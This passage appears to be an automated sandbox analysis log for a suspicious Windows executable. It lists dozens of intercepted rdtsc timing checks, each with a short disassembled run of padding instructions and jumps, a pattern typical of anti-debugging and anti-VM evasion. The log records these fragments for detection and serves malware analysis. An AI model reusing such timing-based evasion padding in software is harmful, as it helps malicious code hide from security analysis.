Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DB0A5D second address: DB0A7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FA944C70C8Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jo 00007FA944C70C8Eh 0x00000011 push esi 0x00000012 pop esi 0x00000013 jg 00007FA944C70C86h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DB0A7C second address: DB0A81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DB0A81 second address: DB0A99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA944C70C8Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DB0A99 second address: DB0A9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DB0C07 second address: DB0C0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DB0C0B second address: DB0C2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944B213F1h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007FA944B213E8h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DB757F second address: DB7598 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944C70C94h 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DB7598 second address: DB75C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA944B213ECh 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ecx 0x0000000e push edx 0x0000000f pop edx 0x00000010 jmp 00007FA944B213F2h 0x00000015 pop ecx 0x00000016 pushad 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DB7715 second address: DB7734 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944C70C8Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007FA944C70C9Ch 0x0000000f pushad 0x00000010 jo 00007FA944C70C86h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DB7FDA second address: DB7FE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DB7FE0 second address: DB7FE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DB7FE4 second address: DB7FE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DB82CC second address: DB82ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA944C70C99h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DB82ED second address: DB82F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DB8F2F second address: DB8F35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DBF04F second address: DBF062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jo 00007FA944B21404h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DBF062 second address: DBF068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DBF068 second address: DBF06C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DBF06C second address: DBF070 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DC2C80 second address: DC2CA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push edi 0x00000008 pushad 0x00000009 popad 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FA944B213F4h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DC205C second address: DC206C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FA944C70C8Eh 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DC206C second address: DC207A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jp 00007FA944B213E6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DC207A second address: DC2080 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DC2194 second address: DC219D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DC231C second address: DC2329 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA944C70C86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DC2329 second address: DC232F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DC232F second address: DC2352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FA944C70C86h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA944C70C96h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DC2352 second address: DC235C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DC235C second address: DC2360 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DC2360 second address: DC2366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DC24C5 second address: DC24C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DC24C9 second address: DC24CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DC24CD second address: DC24D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DC24D9 second address: DC24FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944B213F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b jno 00007FA944B213E8h 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DC24FB second address: DC2501 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DCB3BC second address: DCB3C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DCB3C2 second address: DCB3CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DCB3CB second address: DCB3CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DC9B6B second address: DC9B84 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA944C70C91h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DC9CD9 second address: DC9D02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944B213ECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA944B213F6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DC9D02 second address: DC9D06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DC9E63 second address: DC9E75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA944B213EEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DC9FC2 second address: DC9FD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FA944C70C86h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007FA944C70C86h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DC9FD5 second address: DC9FDF instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA944B213E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DCA179 second address: DCA183 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA944C70C86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DCA183 second address: DCA1A6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jne 00007FA944B213E6h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA944B213F7h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DC9050 second address: DC9056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DD16C5 second address: DD16DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA944B213F4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DD16DD second address: DD16EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007FA944C70C86h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DD16EC second address: DD16F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DD16F1 second address: DD1705 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 jo 00007FA944C70C86h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DD1705 second address: DD1709 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DD196C second address: DD1970 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\P0SJULJxI0.exe RDTSC instruction interceptor: First address: DD346B second address: DD3471 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DD3471 second address: DD3477 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DD3477 second address: DD3481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DD3481 second address: DD349C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944C70C97h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DDDBD0 second address: DDDBDB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FA944B213E6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DDDBDB second address: DDDBE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DE44FE second address: DE4516 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944B213EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DE4516 second address: DE451F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DE451F second address: DE4523 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DE4523 second address: DE4527 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DE4527 second address: DE454E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA944B213F7h 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007FA944B213E6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DE454E second address: DE4552 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DE6900 second address: DE6913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jno 00007FA944B213ECh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DE6913 second address: DE6931 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007FA944C70C98h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DE6931 second address: DE6964 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944B213F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FA944B213F3h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DE6AB4 second address: DE6ABA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DE6ABA second address: DE6AC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DE6AC0 second address: DE6AC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DE6AC6 second address: DE6ACA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D0E9A6 second address: D0E9B0 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA944C70C86h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D0E9B0 second address: D0E9BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DF301F second address: DF3040 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007FA944C70C92h 0x0000000b push edi 0x0000000c pop edi 0x0000000d jp 00007FA944C70C86h 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DF3040 second address: DF3062 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA944B213EDh 0x00000009 jmp 00007FA944B213F1h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DF6B14 second address: DF6B1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DFD5C4 second address: DFD5E5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FA944B213F9h 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DFD5E5 second address: DFD5E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DFD5E9 second address: DFD5ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DFD753 second address: DFD757 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DFD757 second address: DFD784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA944B213F9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ja 00007FA944B213E8h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DFD784 second address: DFD78E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA944C70C86h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DFDC0C second address: DFDC24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA944B213EDh 0x00000009 jc 00007FA944B213E6h 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DFDC24 second address: DFDC38 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA944C70C8Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DFEAC7 second address: DFEACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E038AD second address: E038B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E038B1 second address: E038C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FA944B213E8h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jnc 00007FA944B213E6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E038C7 second address: E038CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E1D86C second address: E1D88B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FA944B213F8h 0x00000008 pop edi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E21F18 second address: E21F1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E21F1C second address: E21F20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E21F20 second address: E21F5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jng 00007FA944C70C86h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jnc 00007FA944C70C8Ah 0x0000001a jno 00007FA944C70C9Fh 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E261DB second address: E261DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E3914E second address: E39152 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E39152 second address: E39158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E39158 second address: E3915E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E39AC1 second address: E39AEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA944B213F4h 0x00000008 jmp 00007FA944B213F2h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E39D97 second address: E39DE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FA944C70C94h 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007FA944C70C92h 0x00000012 jmp 00007FA944C70C99h 0x00000017 push edx 0x00000018 pop edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
